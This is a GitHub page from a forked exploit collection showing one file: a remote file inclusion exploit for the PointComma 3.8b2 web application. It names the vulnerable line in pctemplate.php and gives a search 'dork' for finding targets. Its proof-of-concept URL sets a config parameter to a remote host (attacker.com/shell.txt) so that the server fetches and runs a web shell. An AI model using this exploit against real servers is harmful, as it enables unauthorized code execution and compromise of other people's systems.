forked from 1979139113/0day-today-exploits
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy path10012.txt
21 lines (17 loc) · 833 Bytes
/
10012.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
PointComma <= 3.8b2 Remote File Inclusion Vulnerability
=======================================================
########################################################################
#PointComma <= 3.8b2 Remote File Include Vulnerability
#Download Script : http://nchc.dl.sourceforge.net/project/pointcomma/pointcomma/
#Dork : die("Hacking attempt"); :D
########################################################################
#
#Vuln : ./PointComma-3.8b2/includes/classes/pctemplate.php (line 14)
# <?php
# require($pcConfig['smartyPath'].'Smarty.class.php');
# ?>
#PoC : http://server/[path]/includes/classes/pctemplate.php?pcConfig[smartyPath]=http://attacker.com/shell.txt?cmd
#
#
#
########################################################################